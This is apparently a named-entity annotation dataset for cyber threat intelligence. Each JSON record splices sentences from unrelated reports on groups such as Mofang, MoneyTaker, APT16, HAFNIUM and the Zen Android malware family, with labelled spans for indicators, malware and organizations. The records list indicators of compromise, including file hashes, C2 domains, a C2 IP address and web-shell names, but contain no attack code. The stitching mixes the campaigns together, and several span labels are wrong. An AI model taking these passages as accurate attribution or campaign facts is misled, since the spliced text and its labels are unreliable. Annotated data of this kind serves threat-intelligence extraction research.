{"text": "] today admin [ .databit [ .today cendata [ . In December 2012 Mofang started a campaign against a new target , called ' seg ' for the purpose of this report . The sample cb3dcde34fd9ff0e19381d99b02f9692 connected to documents.myPicture.info and www.documents.myPicture.info and as expected generated the a POST request to /bbs/ info.asp . Related activity may also include a Southeast Asian government and Central Asian telecom .", "spans": [{"start": 8, "end": 33, "label": "Indicator"}, {"start": 34, "end": 45, "label": "Indicator"}, {"start": 171, "end": 203, "label": "Indicator"}, {"start": 217, "end": 241, "label": "Indicator"}, {"start": 246, "end": 274, "label": "Indicator"}, {"start": 329, "end": 337, "label": "Indicator"}, {"start": 376, "end": 402, "label": "Organization"}, {"start": 407, "end": 428, "label": "Organization"}]}
{"text": "] today svc [ . From the configuration it can be determined that the company was running F-Secure Antivirus and Mofang registered the domain to not appear suspicious . Backdoor.APT.Ixeshe : Microsoft reported the exploitation occurred together and is linked to a single group of actors tracked as \u201c HAFNIUM \u201d , a group that has previously targeted the US - based defense companies , law firms , infectious disease researchers , and think tanks .", "spans": [{"start": 8, "end": 15, "label": "Indicator"}, {"start": 89, "end": 107, "label": "System"}, {"start": 112, "end": 118, "label": "System"}, {"start": 168, "end": 187, "label": "Indicator"}, {"start": 190, "end": 199, "label": "Organization"}, {"start": 299, "end": 306, "label": "Organization"}, {"start": 352, "end": 380, "label": "Organization"}, {"start": 383, "end": 392, "label": "Organization"}, {"start": 395, "end": 425, "label": "Organization"}, {"start": 432, "end": 443, "label": "Organization"}]}
{"text": "] cendata [ . In September 2015 Mofang launched another attack . Ixeshe has been used in targeted attacks since 2009, often against entities in East Asia . As our experience with and knowledge of this threat actor grows , we will update this post or release new technical details as appropriate .", "spans": [{"start": 32, "end": 38, "label": "Organization"}, {"start": 65, "end": 71, "label": "Malware"}, {"start": 201, "end": 213, "label": "Organization"}]}
{"text": "] today svcws [ . A new version of ShimRat was built on the 7th of September , uploaded to the server and only days later used in a new campaign . The network traffic is encoded with a custom Base64 alphabet . For our Managed Defense Customers , we have launched a Community Protection Event that will provide frequent updates on this threat actor and activity .", "spans": [{"start": 8, "end": 17, "label": "Indicator"}, {"start": 35, "end": 42, "label": "System"}, {"start": 218, "end": 243, "label": "Organization"}, {"start": 335, "end": 347, "label": "Organization"}]}
{"text": "] cendata [ . MoneyTaker has primarily been targeting card processing systems , including the AWS CBR ( Russian Interbank System ) and purportedly SWIFT ( US ) . We analyzed a recent sample that appears to have targeted entities in Taiwan , a target consistent with previous Ixeshe activity . Beginning in January 2021 , Mandiant Managed Defense observed the creation of web shells on one Microsoft Exchange server file system within a customer \u2019s environment .", "spans": [{"start": 275, "end": 281, "label": "Malware"}, {"start": 321, "end": 345, "label": "Organization"}, {"start": 355, "end": 459, "label": "Indicator"}]}
{"text": "] today www [ . Given the wide usage of STAR in LATAM , financial institutions in LATAM could have particular exposure to a potential interest from the MoneyTaker group . This sample ( aa873ed803ca800ce92a39d9a683c644 ) exhibited network traffic that does not match the earlier pattern and therefore may evade existing network traffic signatures designed to detect Ixeshe related infections . The web shell , named help.aspx ( MD5 : 4b3039cf227c611c45d2242d1228a121 ) , contained code to identify the presence of ( 1 ) FireEye xAgent , ( 2 ) CarbonBlack , or ( 3 ) CrowdStrike Falcon endpoint products and write the output of discovery .", "spans": [{"start": 8, "end": 15, "label": "Indicator"}, {"start": 56, "end": 78, "label": "Organization"}, {"start": 152, "end": 168, "label": "Organization"}, {"start": 185, "end": 217, "label": "Indicator"}, {"start": 365, "end": 371, "label": "Malware"}, {"start": 393, "end": 424, "label": "Indicator"}, {"start": 427, "end": 465, "label": "Indicator"}, {"start": 470, "end": 512, "label": "Indicator"}, {"start": 519, "end": 533, "label": "Organization"}, {"start": 542, "end": 553, "label": "Organization"}, {"start": 565, "end": 583, "label": "Organization"}]}
{"text": "] cendata [ . In addition to banks , the MoneyTaker group has attacked law firms and also financial software vendors . APT16 . The web shell was written to the system by the UMWorkerProcess.exe process , which is associated with Microsoft Exchange Server \u2019s Unified Messaging service .", "spans": [{"start": 29, "end": 34, "label": "Organization"}, {"start": 41, "end": 57, "label": "Organization"}, {"start": 71, "end": 80, "label": "Organization"}, {"start": 119, "end": 124, "label": "Organization"}, {"start": 229, "end": 283, "label": "System"}]}
{"text": "] today PHA Family Highlights : Zen and its cousins January 11 , 2019 Google Play Protect detects Potentially Harmful Applications ( PHAs ) which Google Play Protect defines as any mobile app that poses a potential security risk to users or to user data\u2014commonly referred to as \" malware . Since that time , the group attacked companies in California , Utah , Oklahoma , Colorado , Illinois , Missouri , South Carolina , North Carolina , Virginia and Florida . Between November 26, 2015, and December 1, 2015, known and suspected China based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech , government services , media and financial services industries . This activity suggested exploitation of CVE-2021 - 26858 .", "spans": [{"start": 32, "end": 35, "label": "Malware"}, {"start": 70, "end": 89, "label": "System"}, {"start": 146, "end": 165, "label": "System"}, {"start": 763, "end": 779, "label": "Vulnerability"}]}
{"text": "'' in a variety of ways , such as static analysis , dynamic analysis , and machine learning . The first attack in the US that Group-IB attributes to MoneyTaker was conducted in the spring of 2016 : money was stolen from the bank by gaining access to First Data 's \" STAR \" network operator portal . Each campaign delivered a malicious Microsoft Word document exploiting the aforementioned EPS dict copy use-after-free vulnerability , and the local Windows privilege escalation vulnerability CVE-2015-1701 . Approximately twenty days later , the attacker placed another web shell on a separate Microsoft Exchange Server .", "spans": [{"start": 126, "end": 134, "label": "Organization"}, {"start": 224, "end": 228, "label": "Organization"}, {"start": 335, "end": 344, "label": "Organization"}, {"start": 345, "end": 349, "label": "System"}, {"start": 389, "end": 392, "label": "System"}, {"start": 448, "end": 455, "label": "System"}, {"start": 491, "end": 504, "label": "Vulnerability"}, {"start": 545, "end": 553, "label": "Organization"}, {"start": 593, "end": 618, "label": "System"}]}
{"text": "While our systems are great at automatically detecting and protecting against PHAs , we believe the best security comes from the combination of automated scanning and skilled human review . The first attack in the US that Group-IB attributes to this group was conducted in the spring of 2016 : money was stolen from the bank by gaining access to First Data 's \" STAR \" network operator portal . The successful exploitation of both vulnerabilities led to the delivery of either a downloader that we refer to as IRONHALO , or a backdoor that we refer to as ELMER . This second , partially obfuscated web shell , named iisstart.aspx ( MD5 : 0fd9bffa49c76ee12e51e3b8ae0609ac ) , was more advanced and contained functions to interact with the file system .", "spans": [{"start": 222, "end": 230, "label": "Organization"}, {"start": 320, "end": 324, "label": "Organization"}, {"start": 510, "end": 518, "label": "Malware"}, {"start": 555, "end": 560, "label": "Malware"}, {"start": 632, "end": 670, "label": "Indicator"}, {"start": 734, "end": 749, "label": "System"}]}
{"text": "With this blog series we will be sharing our research analysis with the research and broader security community , starting with the PHA family , Zen . In 2017 , the number of MoneyTaker 's attacks has remained the same with 8 US banks , 1 law firm and 1 bank in Russia being targeted . On November 26, 2015, a suspected China based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies . the web shell included the ability to run arbitrary commands and upload , delete , and view the contents of files .", "spans": [{"start": 145, "end": 148, "label": "Malware"}, {"start": 175, "end": 185, "label": "Organization"}, {"start": 229, "end": 234, "label": "Organization"}, {"start": 239, "end": 247, "label": "Organization"}, {"start": 254, "end": 258, "label": "Organization"}, {"start": 393, "end": 399, "label": "System"}]}
{"text": "Zen uses root permissions on a device to automatically enable a service that creates fake Google accounts . In 2017 , the number of attacks has remained the same with 8 US banks , 1 law firm and 1 bank in Russia being targeted . As shown in Figure 1, the emails originated from the Yahoo ! email address mts03282000@yahoo.co.jp , and contained the subject \u201c Sending of New Year . While the use of web shells is common amongst threat actors , the parent processes , timing , and victim(s ) of these files clearly indicate activity that commenced with the abuse of Microsoft Exchange .", "spans": [{"start": 0, "end": 3, "label": "Malware"}, {"start": 90, "end": 96, "label": "Organization"}, {"start": 172, "end": 177, "label": "Organization"}, {"start": 182, "end": 190, "label": "Organization"}, {"start": 197, "end": 201, "label": "Organization"}, {"start": 255, "end": 261, "label": "System"}, {"start": 282, "end": 287, "label": "Organization"}, {"start": 290, "end": 295, "label": "System"}, {"start": 304, "end": 327, "label": "Indicator"}, {"start": 512, "end": 581, "label": "Indicator"}]}
{"text": "These accounts are created by abusing accessibility services . By analyzing the attack infrastructure , Group-IB identified that MoneyTaker group continuously exfiltrates internal banking documentation to learn about bank operations in preparation for future attacks . Foreword \u201d . In March 2021 , in a separate environment , we observed a threat actor utilize one or more vulnerabilities to place at least one web shell on the vulnerable Exchange Server .", "spans": [{"start": 104, "end": 112, "label": "Organization"}, {"start": 129, "end": 145, "label": "Organization"}, {"start": 217, "end": 221, "label": "Organization"}, {"start": 301, "end": 323, "label": "System"}, {"start": 338, "end": 352, "label": "Organization"}, {"start": 424, "end": 454, "label": "Vulnerability"}]}
{"text": "Zen apps gain access to root permissions from a rooting trojan in its infection chain . Group-IB reports that MoneyTaker uses both borrowed and their own self-written tools . Each phishing message contained the same malicious Microsoft Word attachment . This was likely to establish both persistence and secondary access , as in other environments .", "spans": [{"start": 0, "end": 3, "label": "Malware"}, {"start": 88, "end": 96, "label": "Organization"}, {"start": 226, "end": 235, "label": "Organization"}, {"start": 236, "end": 240, "label": "System"}]}
{"text": "In this blog post , we do not differentiate between the rooting component and the component that abuses root : we refer to them interchangeably as Zen . Group-IB has provided Europol and Interpol with detailed information about the MoneyTaker group for further investigative activities as part of our cooperation in fighting cybercrime . The malicious attachment resembled an article hosted on a legitimate Japanese defense-related website , as both discussed national defense topics and carried the same byline . In this case , Mandiant observed the process w3wp.exe , ( the IIS process associated with the Exchange web front - end ) spawning cmd.exe to write a file to disk .", "spans": [{"start": 147, "end": 150, "label": "Malware"}, {"start": 153, "end": 161, "label": "Organization"}, {"start": 529, "end": 537, "label": "Organization"}, {"start": 551, "end": 675, "label": "Indicator"}]}
{"text": "We also describe apps that we think are coming from the same author or a group of authors . In late September 2015 Mofang used the website of Myanmara 's national airline hosted at www.flymna.com for an attack against an organization in Myanmar . The lure documents also used the Japanese calendar , as indicated by the 27th year in the Heisei period . The file , matches signatures for the tried - and - true China Chopper .", "spans": [{"start": 387, "end": 423, "label": "Organization"}]}
{"text": "All of the PHAs that are mentioned in this blog post were detected and removed by Google Play Protect . To control the full operation , MoneyTaker uses a Pentest framework Server . This demonstrates that the threat actors understand conventional Japanese date notation . We observed that in at least two cases , the threat actors subsequently issued the following command against the Exchange web server : This command attempts to delete the administrator user from the Exchange Organizations administrators group , beginning with the Domain Controller in the current domain .", "spans": [{"start": 82, "end": 101, "label": "System"}, {"start": 136, "end": 146, "label": "Organization"}, {"start": 154, "end": 178, "label": "System"}, {"start": 384, "end": 403, "label": "System"}]}
{"text": "Background Uncovering PHAs takes a lot of detective work and unraveling the mystery of how they 're possibly connected to other apps takes even more . On it , MoneyTaker install a legitimate tool for penetration testing \u2013 Metasploit . Following the exploitation of the EPS and CVE-2015-1701 vulnerabilities , the exploit payload drops either a 32-bit or 64-bit binary containing an embedded IRONHALO malware sample . If the system is in a single - system domain , it will execute on the local computer .", "spans": [{"start": 159, "end": 169, "label": "Organization"}, {"start": 222, "end": 232, "label": "System"}, {"start": 269, "end": 272, "label": "System"}, {"start": 277, "end": 290, "label": "Vulnerability"}, {"start": 391, "end": 399, "label": "Malware"}]}
{"text": "PHA authors usually try to hide their tracks , so attribution is difficult . At the end of June 2015 Mofang started its campaign to gather information of a specific target in relation to the sezs : the cpg Corporation . IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control ( C2 ) server and uniform resource locator ( URL ) path . Per Microsoft \u2019s blog , they have identified additional post - exploitation activities , including : \u2022 Compression of data for exfiltration via 7 - Zip . \u2022 Use of Exchange PowerShell Snap - ins to export mailbox data .", "spans": [{"start": 202, "end": 217, "label": "Organization"}, {"start": 220, "end": 228, "label": "Malware"}, {"start": 259, "end": 263, "label": "Indicator"}, {"start": 328, "end": 347, "label": "System"}, {"start": 350, "end": 352, "label": "System"}, {"start": 410, "end": 422, "label": "Organization"}]}
{"text": "Sometimes , we can attribute different apps to the same author based on a small , unique pieces of evidence that suggest similarity , such as a repetition of an exceptionally rare code snippet , asset , or a particular string in the debug logs . MoneyTaker uses ' fileless ' malware only existing in RAM and is destroyed after reboot . The encoded payload is written to a temporary file , decoded and executed in a hidden window . \u2022 Use of additional offensive security tools Covenant , Nishang , and PowerCat for remote access .", "spans": [{"start": 246, "end": 256, "label": "Organization"}, {"start": 264, "end": 272, "label": "System"}]}
{"text": "Every once in a while , authors leave behind a trace that allows us to attribute not only similar apps , but also multiple different PHA families to the same group or person . To ensure persistence in the system MoneyTaker relies on PowerShell and VBS scripts - they are both difficult to detect by antivirus and easy to modify . The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively , where [%rand%] is a 4-byte hexadecimal number based on the current timestamp . The activity we have observed , coupled with others in the information security industry , indicate that these threat actors are likely using Exchange Server vulnerabilities to gain a foothold into environments .", "spans": [{"start": 212, "end": 222, "label": "Organization"}, {"start": 233, "end": 243, "label": "System"}, {"start": 248, "end": 259, "label": "System"}, {"start": 390, "end": 408, "label": "Indicator"}, {"start": 413, "end": 431, "label": "Indicator"}, {"start": 637, "end": 650, "label": "Organization"}, {"start": 655, "end": 736, "label": "Indicator"}]}
{"text": "However , the actual timeline of the creation of different variants is unclear . After successfully infecting one of the computers and gaining initial access to the system , the attackers perform reconnaissance of the local network in order to gain domain administrator privileges and eventually consolidate control over the network . IRONHALO : AcroRd32Info.exe.exe a8ccb2fc5fec1b89f778d93096f8dd65 . This activity is followed quickly by additional access and persistent mechanisms .", "spans": [{"start": 335, "end": 343, "label": "Malware"}, {"start": 346, "end": 366, "label": "Indicator"}, {"start": 367, "end": 399, "label": "Indicator"}]}
{"text": "In April 2013 , we saw the first sample , which made heavy use of dynamic code loading ( i.e. , fetching executable code from remote sources after the initial app is installed ) . MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs . IRONHALO persists by copying itself to the current user \u2019s Startup folder . We recommend checking the following for potential evidence of compromise : \u2022 Child processes of on Exchange Servers , particularly .", "spans": [{"start": 180, "end": 193, "label": "Organization"}, {"start": 264, "end": 282, "label": "System"}, {"start": 287, "end": 313, "label": "System"}, {"start": 361, "end": 369, "label": "Malware"}, {"start": 420, "end": 427, "label": "System"}]}
{"text": "Dynamic code loading makes it impossible to state what kind of PHA it was . This newly observed activity uses a series of redirections and fileless , malicious implementations of legitimate tools to gain access to the targeted systems . This variant sends an HTTP request to a legitimate Japanese website using a malformed User-Agent string , as shown in Figure 2 . \u2022 New , unexpected compiled ASPX files in the directory \u2022 Reconnaissance , vulnerability - testing requests to the following resources from an external IP address : In our investigations to date , the web shells placed on Exchange Servers have been named differently in each intrusion , and thus the file name alone is not a high - fidelity indicator of compromise .", "spans": [{"start": 259, "end": 263, "label": "Indicator"}, {"start": 323, "end": 333, "label": "System"}, {"start": 424, "end": 528, "label": "Indicator"}, {"start": 588, "end": 604, "label": "System"}, {"start": 621, "end": 730, "label": "Indicator"}]}
{"text": "This sample displayed ads from various sources . Unit 42 recently identified a targeted attack against an individual working for the Foreign Ministry of Uzbekistan in China . The threat actors likely compromised the legitimate site and attempted to use it as a staging server for second-stage payloads . If you believe your Exchange Server was compromised , we recommend investigating to determine the scope of the attack and dwell time of the threat actor .", "spans": [{"start": 49, "end": 56, "label": "Organization"}, {"start": 133, "end": 149, "label": "Organization"}, {"start": 324, "end": 339, "label": "System"}]}
{"text": "More recent variants blend rooting capabilities and click fraud . Since that time , MoneyTaker attacked companies in California , Utah , Oklahoma , Colorado , Illinois , Missouri , South Carolina , North Carolina , Virginia and Florida . On December 1, 2015, threat actors launched two additional spear phishing attacks exploiting the undisclosed EPS vulnerability and CVE-2015-1701 . Furthermore , as system and web server logs may have time or size limits enforced , we recommend preserving the following artifacts for forensic analysis : \u2022 At least 14 days of HTTP web logs from the directories ( include logs from all subdirectories ) \u2022", "spans": [{"start": 84, "end": 94, "label": "Organization"}, {"start": 347, "end": 350, "label": "System"}, {"start": 369, "end": 382, "label": "Vulnerability"}, {"start": 402, "end": 428, "label": "System"}]}
{"text": "As rooting exploits on Android become less prevalent and lucrative , PHA authors adapt their abuse or monetization strategy to focus on tactics like click fraud . In their Operation Tropic Trooper report , Trend Micro documented the behaviour and functionality of an espionage toolkit with several design similarities to those observed in the various components of KeyBoy . Unlike the Nov. 26 campaign , these attacks targeted Taiwanese governmental and media and entertainment organizations . The contents of the Exchange Web Server ( also found within the folder ) \u2022 At least 14 days of Exchange Control Panel ( ECP ) logs , located in We have found significant hunting and analysis value in these log folders , especially for suspicious CMD parameters in the ECP Server logs .", "spans": [{"start": 23, "end": 30, "label": "System"}, {"start": 206, "end": 217, "label": "Organization"}, {"start": 267, "end": 284, "label": "Malware"}, {"start": 365, "end": 371, "label": "System"}, {"start": 514, "end": 533, "label": "System"}, {"start": 589, "end": 624, "label": "System"}, {"start": 762, "end": 777, "label": "System"}]}
{"text": "This post does n't follow the chronological evolution of Zen , but instead covers relevant samples from least to most complex . Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . Moreover , the exploit dropped a different malware payload , a backdoor we refer to as ELMER . To increase investigation transparency , we are including a Last Known True , or LKT , value for network indicators .", "spans": [{"start": 57, "end": 60, "label": "Malware"}, {"start": 180, "end": 193, "label": "Vulnerability"}, {"start": 205, "end": 223, "label": "System"}, {"start": 313, "end": 318, "label": "Malware"}, {"start": 381, "end": 436, "label": "Indicator"}]}
{"text": "Apps with a custom-made advertisement SDK The simplest PHA from the author 's portfolio used a specially crafted advertisement SDK to create a proxy for all ads-related network traffic . Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . The first spear phishing message was sent to a Taiwanese governmental employee on Dec. 1 . FireEye detects this activity across our platforms .", "spans": [{"start": 187, "end": 194, "label": "Organization"}, {"start": 218, "end": 229, "label": "System"}, {"start": 251, "end": 264, "label": "Vulnerability"}, {"start": 276, "end": 294, "label": "System"}, {"start": 388, "end": 395, "label": "Organization"}]}
{"text": "By proxying all requests through a custom server , the real source of ads is opaque . Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan . The attachment was created using the traditional Chinese character set , and contained a flowchart that appeared to be taken from the legitimate Taiwanese government auction website http://shwoo.gov.taipei/buyer_flowchart.asp . The following contains specific detection names that provide an indicator of Exchange Server exploitation or post - exploitation activities we associated with these threat actors .", "spans": [{"start": 110, "end": 121, "label": "System"}, {"start": 143, "end": 156, "label": "Vulnerability"}, {"start": 168, "end": 186, "label": "System"}, {"start": 334, "end": 354, "label": "Organization"}, {"start": 371, "end": 414, "label": "Indicator"}, {"start": 494, "end": 509, "label": "System"}]}
{"text": "This example shows one possible implementation of this technique . In 2016 , Group-IB identified 10 attacks conducted by MoneyTaker , 6 attacks on banks in the US , 1 attack on a US service provider , 1 attack on a bank in the UK and 2 attacks on Russian banks . The second December spear phishing attack targeted Taiwan based news media organizations . Last week , the Biden administration released its formal roadmap for its national cybersecurity initiative meant to encourage greater investment in cybersecurity and strengthen the U.S. \u2019s critical infrastructure security ( and more ) .", "spans": [{"start": 77, "end": 85, "label": "Organization"}, {"start": 147, "end": 152, "label": "Organization"}, {"start": 182, "end": 198, "label": "Organization"}, {"start": 215, "end": 219, "label": "Organization"}, {"start": 255, "end": 260, "label": "Organization"}, {"start": 370, "end": 390, "label": "Organization"}]}
{"text": "This approach allows the authors to combine ads from third-party advertising networks with ads they created for their own apps . If KeyBoy is a single component of a larger espionage toolkit , the developers may have realized that this older , static-key based , configuration encoding algorithm was inadvertently providing a link between disparate components of their malware suite . The emails originated from the address dpptccb.dpp@msa.hinet.net , and contained the subject DPP's Contact Information Update . Republican state lawmakers are backing a legal challenge in the court systems to block an Environmental Protection Administration rule that asked local water systems to evaluate their current cybersecurity systems and protections while conducting sanitation surveys .", "spans": [{"start": 132, "end": 138, "label": "System"}, {"start": 263, "end": 295, "label": "System"}, {"start": 314, "end": 330, "label": "Malware"}, {"start": 389, "end": 395, "label": "System"}, {"start": 424, "end": 449, "label": "Indicator"}, {"start": 513, "end": 539, "label": "Organization"}, {"start": 603, "end": 642, "label": "Organization"}]}
{"text": "It may even allow them to sell ad space directly to application developers . In 2016 , Group-IB identified 10 attacks conducted by MoneyTaker ; 6 attacks on banks in the US , 1 attack on a US service provider , 1 attack on a bank in the UK and 2 attacks on Russian banks . Based on the email address naming convention and message subject , the threat actors may have tried to make the message appear to be a legitimate communication from the Democratic Progressive Party ( DPP ) , Taiwan \u2019s opposition party . To me , simply asking critical infrastructure to consider these factors as part of their normal processes seems like a non - issue , but the U.S. Appeals Court has put a hold on this rule for the time being ( though it did n\u2019t give a precise reason at the time of its ruling ) .", "spans": [{"start": 87, "end": 95, "label": "Organization"}, {"start": 157, "end": 162, "label": "Organization"}, {"start": 192, "end": 208, "label": "Organization"}, {"start": 225, "end": 229, "label": "Organization"}, {"start": 265, "end": 270, "label": "Organization"}, {"start": 286, "end": 291, "label": "System"}, {"start": 532, "end": 555, "label": "Organization"}, {"start": 651, "end": 669, "label": "Organization"}]}
{"text": "The advertisement SDK also collects statistics about clicks and impressions to make it easier to track revenue . The NetTraveler trojan has been known to be used in targeted cyber espionage attacks for more than a decade by nation state threat actors and continues to be used to target its victims and exfiltrate data . Unlike the previous exploit documents , this malicious attachment did not contain any visible text when opened in Microsoft Word . Two leading Republican members of the U.S. House came out hours after the Biden administration released the roadmap , saying they would use their respective House panels to , \u201c exercise strict oversight on CISA \u2019s efforts \u201d to implement many of the policies outlined .", "spans": [{"start": 117, "end": 135, "label": "System"}, {"start": 279, "end": 297, "label": "Malware"}, {"start": 302, "end": 317, "label": "Malware"}, {"start": 434, "end": 443, "label": "Organization"}, {"start": 444, "end": 448, "label": "System"}, {"start": 489, "end": 499, "label": "Organization"}, {"start": 525, "end": 545, "label": "Organization"}, {"start": 608, "end": 620, "label": "Organization"}]}
{"text": "Selling the ad traffic directly or displaying ads from other sources in a very large volume can provide direct profit to the app author from the advertisers . The exploit document carrying this alternate KeyBoy configuration also used a decoy document which was displayed to the user after the exploit launched . The exploit documents delivered during the December campaigns dropped a binary containing an embedded variant of a backdoor we refer to as ELMER . Regardless of which side of the political spectrum you fall , cybersecurity should be something our lawmakers can all agree on .", "spans": [{"start": 163, "end": 179, "label": "Malware"}, {"start": 204, "end": 210, "label": "System"}, {"start": 237, "end": 251, "label": "Malware"}, {"start": 452, "end": 457, "label": "Malware"}, {"start": 560, "end": 569, "label": "Organization"}]}
{"text": "We have seen two types of apps that use this custom-made SDK . Only one incident involving a Russian bank was promptly identified and prevented that is known to Group-IB . ELMER is a non-persistent proxy-aware HTTP backdoor written in Delphi , and is capable of performing file uploads and downloads , file execution , and process and directory listings . Say these arguments extend through the 2024 election \u2014 what happens if control of the White House or Congress switches between parties ?", "spans": [{"start": 101, "end": 105, "label": "Organization"}, {"start": 161, "end": 169, "label": "Organization"}, {"start": 172, "end": 177, "label": "Malware"}, {"start": 210, "end": 214, "label": "Indicator"}, {"start": 235, "end": 241, "label": "System"}, {"start": 442, "end": 453, "label": "Organization"}]}
{"text": "The first are games of very low quality that mimic the experience of popular mobile games . This program is designed to capture keystrokes , take screenshots of the user 's desktop and get contents from the clipboard . To retrieve commands , ELMER sends HTTP GET requests to a hard-coded C2 server , and parses the HTTP response packets received from the C2 server for an integer string corresponding to the command that needs to be executed . Our researchers recently discovered a threat actor conducting several campaigns against government entities , military organizations and civilian users in Ukraine and Poland .", "spans": [{"start": 120, "end": 138, "label": "Malware"}, {"start": 141, "end": 157, "label": "Malware"}, {"start": 185, "end": 197, "label": "Malware"}, {"start": 242, "end": 247, "label": "Malware"}, {"start": 254, "end": 258, "label": "Indicator"}, {"start": 288, "end": 290, "label": "System"}, {"start": 315, "end": 319, "label": "Indicator"}, {"start": 355, "end": 357, "label": "System"}, {"start": 506, "end": 523, "label": "Organization"}, {"start": 532, "end": 551, "label": "Organization"}, {"start": 554, "end": 576, "label": "Organization"}, {"start": 581, "end": 595, "label": "Organization"}]}
{"text": "While the counterfeit games claim to provide similar functionality to the popular apps , they are simply used to display ads through a custom advertisement SDK . To conduct targeted attacks , MoneyTaker use a distributed infrastructure that is difficult to track . Table 2 lists the ELMER backdoors observed during the December campaigns . Our recent reporting states that these operations are very likely aimed at stealing information and gaining persistent remote access .", "spans": [{"start": 192, "end": 202, "label": "Organization"}, {"start": 209, "end": 235, "label": "System"}, {"start": 283, "end": 298, "label": "Malware"}]}
{"text": "The second type of apps reveals an evolution in the author 's tactics . This technique hides the true C2 server from researchers that do not have access to both the rastls.dll and Sycmentec.config files . The ELMER variant 6c33223db475f072119fe51a2437a542 beaconed to the C2 IP address 121.127.249.74 over port 443 . The final payloads include the AgentTesla remote access trojan ( RAT ) , Cobalt Strike beacons and njRAT .", "spans": [{"start": 165, "end": 175, "label": "Malware"}, {"start": 180, "end": 202, "label": "Malware"}, {"start": 209, "end": 214, "label": "Malware"}, {"start": 223, "end": 255, "label": "Indicator"}, {"start": 272, "end": 274, "label": "System"}, {"start": 286, "end": 300, "label": "Indicator"}, {"start": 348, "end": 385, "label": "Malware"}, {"start": 390, "end": 403, "label": "System"}, {"start": 416, "end": 421, "label": "System"}]}
{"text": "Instead of implementing very basic gameplay , the authors pirated and repackaged the original game in their app and bundled with it their advertisement SDK . Hackers use Metasploit to conduct all these activities : network reconnaissance , search for vulnerable applications , exploit vulnerabilities , escalate systems privileges , and collect information . APT16 . If you \u2019re a user in Ukraine or Poland , especially someone working in the government or military sectors , this is a clear - cut example of a spam campaign targeting this population .", "spans": [{"start": 170, "end": 180, "label": "System"}, {"start": 359, "end": 364, "label": "Organization"}, {"start": 438, "end": 452, "label": "Organization"}, {"start": 456, "end": 472, "label": "Organization"}, {"start": 510, "end": 523, "label": "Organization"}]}
{"text": "The only noticeable difference is the game has more ads , including ads on the very first screen . Over the years they've used application components from Norman , McAfee and Norton . While attribution of the first two spear phishing attacks is still uncertain , we attribute the second December phishing campaign to the China based APT group that we refer to as APT16 . For those who fall outside of that demographic , it \u2019s interesting that this group is still relying on the user enabling macros in Office , since Microsoft disabled those by default earlier this year .", "spans": [{"start": 155, "end": 161, "label": "Organization"}, {"start": 164, "end": 170, "label": "Organization"}, {"start": 175, "end": 181, "label": "Organization"}, {"start": 363, "end": 368, "label": "Organization"}, {"start": 517, "end": 526, "label": "System"}]}
{"text": "In all cases , the ads are used to convince users to install other apps from different developer accounts , but written by the same group . Recently , Falcon Intelligence observed new activity from MUSTANG PANDA , using a unique infection chain to target likely Mongolia-based victims . This is based on the use of the known APT16 domain rinpocheinfo.com , as well as overlaps in previously observed targeting and tactics , techniques and procedures ( TTPs ) . These are also highly targeted emails with ( relatively speaking ) convincing lures , so whoever is behind these is not to be ignored .", "spans": [{"start": 151, "end": 170, "label": "Organization"}, {"start": 229, "end": 244, "label": "System"}, {"start": 325, "end": 330, "label": "Organization"}, {"start": 338, "end": 354, "label": "Indicator"}, {"start": 492, "end": 498, "label": "Organization"}]}
{"text": "Those apps use the same techniques to monetize their actions . Throughout the years , the Mofang group has compromised countless servers belonging to government or other Myanmar related organizations , in order to stage attacks . Taiwanese citizens will go to the polls on January 16 , 2016 , to choose a new President and legislators . There are multiple Cisco Secure protections in place to defend against the types of spam used in these campaigns .", "spans": [{"start": 150, "end": 160, "label": "Organization"}, {"start": 356, "end": 380, "label": "System"}, {"start": 408, "end": 425, "label": "Organization"}, {"start": 440, "end": 449, "label": "Organization"}]}
{"text": "Click fraud apps The authors ' tactics evolved from advertisement spam to real PHA ( Click Fraud ) . This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page . According to recent opinion polls , the Democratic Progressive Party ( DPP ) candidate Tsai Ing-wen is leading her opponents and is widely expected to win the election . Other Snort rules and detection content can prevent the execution of the malware used as the final payload .", "spans": [{"start": 154, "end": 163, "label": "Malware"}, {"start": 172, "end": 190, "label": "Malware"}, {"start": 335, "end": 363, "label": "Organization"}, {"start": 366, "end": 369, "label": "Organization"}]}
{"text": "Click fraud PHAs simulate user clicks on ads instead of simply displaying ads and waiting for users to click them . A report published by Kaspersky Labs in 2011 on NetTraveler also mentions the C2 servers were being hosted by Krypt Technolgies . The DPP is part of the pan-green coalition that favors Taiwanese independence over reunification with the mainland , and the party \u2019s victory would represent a shift away from the ruling Kuomintang \u2019s closer ties with the PRC . Chinese state - sponsored actors reportedly accessed email accounts belonging to several U.S.-based organizations and federal government agencies , including the State Department .", "spans": [{"start": 138, "end": 152, "label": "Organization"}, {"start": 164, "end": 175, "label": "System"}, {"start": 468, "end": 471, "label": "Organization"}, {"start": 474, "end": 506, "label": "Organization"}, {"start": 563, "end": 587, "label": "Organization"}, {"start": 592, "end": 619, "label": "Organization"}, {"start": 636, "end": 652, "label": "Organization"}]}
{"text": "This allows the PHA authors to monetize their apps more effectively than through regular advertising . Obviously , the developers behind NetTraveler have taken steps to try to hide the malware 's configuration . Since 1949 , Beijing has claimed Taiwan as a part of China and strongly opposes any action toward independence . The U.S. Cybersecurity and Infrastructure Security Agency ( CISA ) released a detailed timeline on the campaign , stating that an investigation from Microsoft revealed that \u201c advanced persistent threat ( APT ) actors accessed and exfiltrated unclassified Exchange Online Outlook data \u201d after users reported suspicious activities in their Microsoft 365 cloud environment .", "spans": [{"start": 137, "end": 148, "label": "System"}, {"start": 329, "end": 391, "label": "Organization"}, {"start": 424, "end": 436, "label": "Organization"}, {"start": 474, "end": 483, "label": "Organization"}, {"start": 500, "end": 541, "label": "Organization"}, {"start": 542, "end": 653, "label": "Indicator"}, {"start": 663, "end": 694, "label": "System"}]}
